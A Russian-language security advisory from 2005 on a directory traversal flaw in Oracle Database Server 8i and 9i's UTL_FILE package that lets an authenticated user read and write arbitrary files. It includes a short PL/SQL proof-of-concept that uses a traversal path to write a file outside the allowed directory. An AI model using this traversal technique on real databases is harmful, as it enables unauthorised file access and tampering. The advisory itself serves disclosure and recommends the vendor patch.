Раскрытие информации в Oracle Database Server

Дата публикации:
10.03.2005
Всего просмотров:
1271
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Oracle Database Server 8i, 9i

Описание:
Уязвимость позволяет удаленному авторизованному пользователю получить доступ к произвольным файлам на системе.

Уязвимость существует в пакете UTL_FILE из-за некорректной обработки входных данных в некоторых функциях. Удаленный авторизованный пользователь может изменить значение некоторых объектов функции MEDIA_DIR на символы обхода каталога и получить доступ на чтение и запись к произвольным файлам на системе. Пример:

declare
f utl_file.file_type;
begin
f:=UTL_FILE.FOPEN
('MEDIA_DIR','\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\Unbreakable.txt','w',1000);
UTL_FILE.PUT_LINE (f,'Sure',TRUE);
UTL_FILE.FCLOSE(f);
end;

Пример/Эксплоит: См. источник сообщения.

URL производителя: http://www.oracle.com

Решение: Установите исправление от производителя.

Ссылки: Oracle Database Server Directory transversal

или введите имя

CAPTCHA